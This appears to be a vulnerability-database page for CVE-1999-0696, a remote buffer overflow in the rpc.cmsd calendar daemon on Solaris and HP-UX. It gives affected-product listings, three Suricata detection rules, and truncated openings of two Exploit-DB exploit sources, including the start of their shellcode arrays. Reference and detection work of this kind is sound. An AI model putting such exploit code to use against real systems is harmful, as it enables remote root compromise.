CVE-1999-0696
published 1999-07-01CVE-1999-0696: Buffer overflow in CDE Calendar Manager Service Daemon (rpc.cmsd).
PriorityP338critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
12.16%
95.6th percentile
Buffer overflow in CDE Calendar Manager Service Daemon (rpc.cmsd).
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | hp-ux | — | — |
| hp | hp-ux | — | — |
| sun | solaris | — | — |
| sun | solaris | — | — |
| sun | sunos | — | — |
| sun | sunos | — | — |
| sun | sunos | — | — |
| sun | sunos | — | — |
| sun | sunos | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
GPL RPC CMSD TCP CMSD_INSERT buffer overflow attempt
suricata·2010-09-23
CVE-1999-0696 GPL RPC CMSD TCP CMSD_INSERT buffer overflow attempt
GPL RPC CMSD TCP CMSD_INSERT buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC CMSD TCP CMSD_INSERT buffer overflow attempt"; flow:established,to_server; content:"|00 01 86 E4|"; depth:4; offset:16; content:"|00 00 00 06|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_jump:4,0,relative,align; byte_test:4,>,1000,28,relative; content:"|00 00 00 00|"; depth:4; offset:8; reference:bugtraq,524; reference:cve,1999-0696; reference:url,www.cert.org/advisories/CA-99-08-cmsd.html; classtype:misc-attack; sid:2101909; rev:14; metadata:created_at 2010_09_23, cve CVE_1999_0696, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL RPC CMSD TCP CMSD_CREATE buffer overflow attempt
suricata·2010-09-23
CVE-1999-0696 GPL RPC CMSD TCP CMSD_CREATE buffer overflow attempt
GPL RPC CMSD TCP CMSD_CREATE buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC CMSD TCP CMSD_CREATE buffer overflow attempt"; flow:established,to_server; content:"|00 01 86 E4|"; depth:4; offset:16; content:"|00 00 00 15|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,1024,0,relative; content:"|00 00 00 00|"; depth:4; offset:8; reference:bugtraq,524; reference:cve,1999-0696; classtype:attempted-admin; sid:2101908; rev:11; metadata:created_at 2010_09_23, cve CVE_1999_0696, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL RPC CMSD UDP CMSD_CREATE buffer overflow attempt
suricata·2010-09-23
CVE-1999-0696 GPL RPC CMSD UDP CMSD_CREATE buffer overflow attempt
GPL RPC CMSD UDP CMSD_CREATE buffer overflow attempt
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC CMSD UDP CMSD_CREATE buffer overflow attempt"; content:"|00 01 86 E4|"; depth:4; offset:12; content:"|00 00 00 15|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,1024,0,relative; content:"|00 00 00 00|"; depth:4; offset:4; reference:bugtraq,524; reference:cve,1999-0696; classtype:attempted-admin; sid:2101907; rev:11; metadata:created_at 2010_09_23, cve CVE_1999_0696, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Exploit-DB
Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (1)
exploitdb·1999-07-13
CVE-1999-0696 Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (1)
Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/524/info
There is a remotely exploitable buffer overflow vulnerability in rpc.cmsd which ships with Sun's Solaris and HP-UX versions 10.20, 10.30 and 11.0 operating systems. The consequence is a remote root compromise.
/*## copyright LAST STAGE OF DELIRIUM jul 1999 poland *://lsd-pl.net/ #*/
/*## rpc.cmsd #*/
#include
#include
#include
#include
#include
#include
#include
#define ADRNUM 1500
#define NOPNUM 1600
#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PING 0
#define CMSD_CREATE 21
#define CMSD_INSERT 6
char findsckcode[]=
"\x20\xbf\xff\xff" /* bn,a */
"\x20\xbf\xff\xff" /* bn,a */
"\x7f\xff\xff\xff" /* call
Exploit-DB
Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)
exploitdb·1999-07-13
CVE-1999-0696 Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)
Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/524/info
There is a remotely exploitable buffer overflow vulnerability in rpc.cmsd which ships with Sun's Solaris and HP-UX versions 10.20, 10.30 and 11.0 operating systems. The consequence is a remote root compromise.
/*
* Unixware 7.x rpc.cmsd exploit by jGgM
* http://www.netemperor.com/en/
* EMail: [email protected]
*/
#include
#include
#include
#include
#include
#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PROC 21
#define BUFFER_SIZE 1036
#define SHELL_START 1024
#define RET_LENGTH 12
#define ADJUST 100
#define NOP 0x90
#define LEN 68
char shell[] =
/* 0 */ "\xeb\x3d" /* jmp springboard [2000]*/
/* syscall: [200
No writeups or analysis indexed.
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/188http://www.ciac.org/ciac/bulletins/j-051.shtmlhttp://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9908-102http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/188http://www.ciac.org/ciac/bulletins/j-051.shtmlhttp://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9908-102
1999-07-01
Published